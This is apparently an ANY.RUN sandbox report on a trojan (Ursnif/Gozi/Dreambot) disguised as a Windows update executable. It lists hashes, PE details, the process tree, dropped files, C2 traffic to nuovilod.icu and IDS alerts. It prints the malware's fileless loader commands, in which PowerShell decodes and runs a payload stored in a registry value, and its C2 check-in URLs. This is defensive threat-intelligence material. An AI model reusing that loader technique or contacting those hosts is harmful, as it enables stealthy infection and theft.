analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

KB4470637_20190112_15321011.exe

Full analysis: https://app.any.run/tasks/6995be3f-ce12-4943-8d2b-91eda575f43e
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 21, 2019, 10:01:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gozi
ursnif
dreambot
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed
MD5:

06447E8FA724C88E71CB6693B9DB8A35

SHA1:

291414A18069BF6930F1B54437B104522D3AA8FE

SHA256:

92ABC3DEA5C843D1C92325A533F3E20C811CF4844080E79D1B40D4714F3363FF

SSDEEP:

3072:pJ8BnrijMOkvfNqDarRzgwAumNprrI6BXlewtyE4NHTRkiB3tBNSH4PWoK0KHsJw:b8coVrRzrAu+Ty7bkqBNSH0vChMwQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs app for hidden code execution

      • KB4470637_20190112_15321011.exe (PID: 3108)
    • Connects to CnC server

      • iexplore.exe (PID: 3648)
      • iexplore.exe (PID: 2744)
    • URSNIF was detected

      • iexplore.exe (PID: 3648)
      • iexplore.exe (PID: 2744)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3720)
    • Application was injected by another process

      • explorer.exe (PID: 2036)
    • Runs injected code in another process

      • powershell.exe (PID: 124)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2952)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • KB4470637_20190112_15321011.exe (PID: 3108)
      • rundll32.exe (PID: 2572)
      • explorer.exe (PID: 2036)
    • Application launched itself

      • KB4470637_20190112_15321011.exe (PID: 3108)
    • Creates files in the user directory

      • powershell.exe (PID: 124)
    • Uses RUNDLL32.EXE to load library

      • explorer.exe (PID: 2036)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3356)
    • Changes internet zones settings

      • iexplore.exe (PID: 3356)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3648)
      • iexplore.exe (PID: 2744)
    • Creates files in the user directory

      • iexplore.exe (PID: 3648)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3648)
      • iexplore.exe (PID: 2744)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (v2.x) (51)
.exe | Win32 EXE PECompact compressed (generic) (35.9)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)
.exe | Generic Win/DOS Executable (1.7)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x13ae1
UninitializedDataSize: -
InitializedDataSize: 348160
CodeSize: 144384
LinkerVersion: 14
PEType: PE32
TimeStamp: 2019:03:20 10:05:11+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 20-Mar-2019 09:05:11

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 2
Time date stamp: 20-Mar-2019 09:05:11
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0007D000
0x00037000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.9986
.rsrc
0x0007E000
0x00003000
0x00002200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
6.35058

Resources

Title
Entropy
Size
Codepage
Language
Type
1
7.42874
308
Latin 1 / Western European
UNKNOWN
RT_CURSOR
2
5.3009
4264
Latin 1 / Western European
UNKNOWN
RT_ICON
101
0
303954
Latin 1 / Western European
UNKNOWN
RT_BITMAP
104
0
20
Latin 1 / Western European
UNKNOWN
RT_GROUP_CURSOR
105
0
1246
Latin 1 / Western European
UNKNOWN
UNKNOWN
144
1.94375
20
Latin 1 / Western European
UNKNOWN
RT_GROUP_ICON

Imports

kernel32.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
16
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start inject kb4470637_20190112_15321011.exe no specs cmd.exe no specs kb4470637_20190112_15321011.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe rundll32.exe no specs cmd.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs explorer.exe cmd.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3108"C:\Users\admin\AppData\Local\Temp\KB4470637_20190112_15321011.exe" C:\Users\admin\AppData\Local\Temp\KB4470637_20190112_15321011.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3716"C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exeKB4470637_20190112_15321011.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3148"C:\Users\admin\AppData\Local\Temp\KB4470637_20190112_15321011.exe"C:\Users\admin\AppData\Local\Temp\KB4470637_20190112_15321011.exeKB4470637_20190112_15321011.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3356"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3648"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3356 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2744"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3356 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2572"C:\Windows\System32\rundll32.exe" shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))C:\Windows\System32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3720"C:\Windows\system32\cmd.exe" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
124powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3552"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\kyhzanaq.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
733
Read events
603
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
17
Unknown types
7

Dropped files

PID
Process
Filename
Type
3356iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3356iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3356iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5746D4CB298C78B9.TMP
MD5:
SHA256:
3356iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
MD5:
SHA256:
3356iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFDE3A744C582CE820.TMP
MD5:
SHA256:
3356iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{58DFECEE-4BC0-11E9-B63D-5254004A04AF}.dat
MD5:
SHA256:
3648iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:64A034FB72B188C572B56FEEE3C46FB4
SHA256:70CAD21CAADA5322F519C1A66B35EE15E17BE43CFCC25EA1AC14C29C4EE79A5E
3356iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF79313ECB08904676.TMP
MD5:
SHA256:
3648iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019032120190322\index.datdat
MD5:65F2D24F52F62A0A2DD81956E89E7547
SHA256:0FE8BD53B17E445D232B9062E968D3606722BB7968276F291ADC0E65E9A68870
3356iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{58DFECEC-4BC0-11E9-B63D-5254004A04AF}.datbinary
MD5:17643D9C668FFF09F0420667B5A22FD5
SHA256:9A3C2264482D1A0F3F6C5E90614D5C36371FC47B3F28BB9BAABCD60541CCE999
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2744
iexplore.exe
GET
200
109.230.199.238:80
http://nuovilod.icu/images/33qErZx_2FtFiF/sNtkkp5DgF0qI53_2BK2m/aUyUWqN4jIOcgz5Q/A2b9clKscs1FM_2/FzS64X_2FG7X36oV4F/uPL7J5p2t/UjlYZq7zja9qDmG_2FsZ/LSn2BJAiP5jYuYOb_2F/FbI1ZspVcbBh_2FTn0ZoG8/CifGZl_2F/v3V.avi
SE
text
1.80 Kb
malicious
3648
iexplore.exe
GET
200
109.230.199.238:80
http://nuovilod.icu/images/HBmr5xyQR/6PqBWPzG9Sr5rt0tp2LH/t2iVDHy0cD44qEbBWIs/M0us0_2FypOmJexb0ML541/9QjsQBzCahtRx/AEBeuClg/V18HKGjR_2Bjo8MiYqfnFfF/mt8ylC0KlP/vwdXL3Q5ylp1VYVyi/wYCWxep9/oZYdo.avi
SE
text
159 Kb
malicious
3356
iexplore.exe
GET
200
109.230.199.238:80
http://nuovilod.icu/favicon.ico
SE
image
5.30 Kb
malicious
3356
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3356
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3356
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3356
iexplore.exe
109.230.199.238:80
nuovilod.icu
Portlane AB
SE
malicious
2744
iexplore.exe
109.230.199.238:80
nuovilod.icu
Portlane AB
SE
malicious
3648
iexplore.exe
109.230.199.238:80
nuovilod.icu
Portlane AB
SE
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
nuovilod.icu
  • 109.230.199.238
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
3648
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2744
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
4 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144